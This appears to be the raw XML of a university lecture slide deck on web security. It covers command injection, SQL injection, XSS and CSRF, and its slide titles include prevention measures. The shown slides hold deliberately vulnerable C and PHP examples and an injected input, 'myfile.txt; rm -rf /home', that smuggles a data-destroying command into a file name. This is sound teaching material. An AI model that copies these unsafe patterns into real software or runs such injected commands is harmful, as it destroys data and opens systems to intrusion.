              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> Custom HTTP Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="319088" indent="-65088" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> Cookies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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765D1C09-D2C0-EDB7-3FB8-FBD0F94BB75A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Command Injection</a:t>
            </a:r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7A27D431-1F67-B7D4-2F13-335D7EC5380D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="4161631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150"/>
              <a:t>The goal of command injection attacks is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2150" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute an arbitrary command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2150"/>
              <a:t>on the system. Typically possible when a developer passes unsafe user data into a shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2150"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2150" b="1">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>head100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2150"/>
              <a:t> — simple program that cats first 100 lines of a program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400"/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solidFill>
                  <a:srgbClr val="C01E5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int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1800">
                <a:solidFill>
                  <a:srgbClr val="0433FF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main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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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int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argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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char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**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argv) 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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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char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*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cmd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=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malloc(strlen(argv[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])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+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100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   strcpy(cmd, “head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-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n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100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”);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   strcat(cmd, argv[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]);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   system(cmd);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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06F817B-790B-FE86-6E4E-D82D02D8EEE8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Command Injection</a:t>
            </a:r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4C4CA7A9-3BCD-F955-1FD4-A3F3C158EA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="3569494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/>
              <a:t>Source:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="500"/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solidFill>
                  <a:srgbClr val="C01E5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int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1800">
                <a:solidFill>
                  <a:srgbClr val="0433FF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main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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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int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argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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char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**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argv) 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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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char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*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cmd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=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malloc(strlen(argv[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])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+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100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   strcpy(cmd, “head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-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n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100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”);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   strcat(cmd, argv[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]);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   system(cmd);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br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="Monaco" charset="0"/>
                <a:cs typeface="Monaco" charset="0"/>
                <a:sym typeface="Monaco" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="017100"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Normal Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="017100"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1550" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   ./head10 myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> system(“head -n 100 myfile.txt”)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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6DCBF81-9D5D-8534-3A7A-401839FF35E0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Command Injection</a:t>
            </a:r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798AA2BA-DAC2-4212-2BCB-72147D78E967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="392112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/>
              <a:t>Source:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="500"/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solidFill>
                  <a:srgbClr val="C01E5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int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1800">
                <a:solidFill>
                  <a:srgbClr val="0433FF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main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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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int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argc, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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char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**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argv) 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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="C01E5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char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*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cmd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=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malloc(strlen(argv[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])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+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100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   strcpy(cmd, “head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-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n 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100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”);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   strcat(cmd, argv[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="797979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</a:t>
            </a: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]);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    system(cmd);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800">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier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br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Monaco" charset="0"/>
                <a:ea typeface="Monaco" charset="0"/>
                <a:cs typeface="Monaco" charset="0"/>
                <a:sym typeface="Monaco" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="B51600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversarial Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="B51600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1550" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   ./head10 “myfile.txt; rm -rf /home” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="B5160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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> system(“head -n 100 myfile.txt; rm -rf /home”);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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DDA2C98-F88B-4F5E-0FF1-63E3B87EE4E5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SQL Injection</a:t>
            </a:r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90FE96EE-160C-B212-A11A-9450D447A068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="8689975" cy="2669381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/>
              <a:t>Last examples all focused on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t> injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Command injection oftentimes occurs when developers try to build SQL queries that use user-provided data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Known as SQL injection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1" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F7DA6E8-E6FE-13E0-59A8-C629775E59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7" t="10773" r="23897" b="10773"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554038" y="1650207"/>
            <a:ext cx="3978275" cy="4712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682" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D5DA75A-EC01-14C9-2C55-B2850BF00A21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SQL Injection Example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9B0E719F-351A-9A13-E41E-20BF6FFB5FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4717257" y="1847057"/>
            <a:ext cx="7009606" cy="4052094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$login = $_POST['login'];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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$pass = $_POST['password'];  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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$sql = "SELECT id FROM users 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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>        WHERE username = '$login'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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>        AND password = '$password'”;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="10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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>$rs = $db-&gt;executeQuery($sql);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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>if $rs.count &gt; 0 {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400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>   // success</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D362054B-4380-1E40-EC6E-D88C2D925F59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Non-Malicious Input</a:t>
            </a:r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A06A2B2F-EDB3-294C-8D7A-C585D28C7953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="4068763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/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$u = $_POST['login’]; // </a:t>
            </a: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zakir</a:t>
            </a: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$pp = $_POST['password']; // </a:t>
            </a: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123</a:t>
            </a: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$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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$rs = $db-&gt;executeQuery($sql);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if $rs.count &gt; 0 {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   // success</a:t>
            </a:r>
            <a:b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</a:b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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CDC0D46-F281-7B58-3B1D-5FCC8D94EFEF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pPr algn="l" eaLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="6500"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Non-Malicious Input</a:t>
            </a:r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0229A4DA-E27A-2921-18F5-4390FBB9AB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10502900" cy="4068763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/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$u = $_POST['login’]; // </a:t>
            </a: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zakir</a:t>
            </a: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$pp = $_POST['password']; // </a:t>
            </a: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123</a:t>
            </a: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endParaRPr lang="en-US" altLang="en-US" sz="210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$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;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 b="1">
                <a:solidFill>
                  <a:srgbClr val="004D80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//     "SELECT id FROM users WHERE uid = 'zakir' AND pwd = '123'”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$rs = $db-&gt;executeQuery($sql);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if $rs.count &gt; 0 {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   // success</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier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8255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  <a:sym typeface="Helvetica Neue" panose="02000503000000020004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8255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  <a:sym typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2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2276</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>253</Paragraphs>
  <Slides>28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42" baseType="lpstr">
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Bold Condensed</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue Medium</vt:lpstr>
      <vt:lpstr>Monaco</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>White</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>OWASP Ten Most Critical Web Security Risks</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>Non-Malicious Input</vt:lpstr>
      <vt:lpstr>Non-Malicious Input</vt:lpstr>
      <vt:lpstr>Bad Input</vt:lpstr>
      <vt:lpstr>Malicious Input</vt:lpstr>
      <vt:lpstr>No Username Needed!</vt:lpstr>
      <vt:lpstr>Causing Damage</vt:lpstr>
      <vt:lpstr>MSSQL xp_cmdshell </vt:lpstr>
      <vt:lpstr>Escaping Database Server </vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>Parameterized SQL</vt:lpstr>
      <vt:lpstr>Object Relational Mappers </vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Search Example</vt:lpstr>
      <vt:lpstr>Normal Request</vt:lpstr>
      <vt:lpstr>Embedded Script</vt:lpstr>
      <vt:lpstr>Cookie Theft!</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cookie-Based Authentication</vt:lpstr>
      <vt:lpstr>Preventing CSRF Attacks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Dongdong She</dc:creator>
  <cp:lastModifiedBy>Dongdong She</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-25T14:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-25T14:37:32Z</dcterms:modified>
</cp:coreProperties>
</file>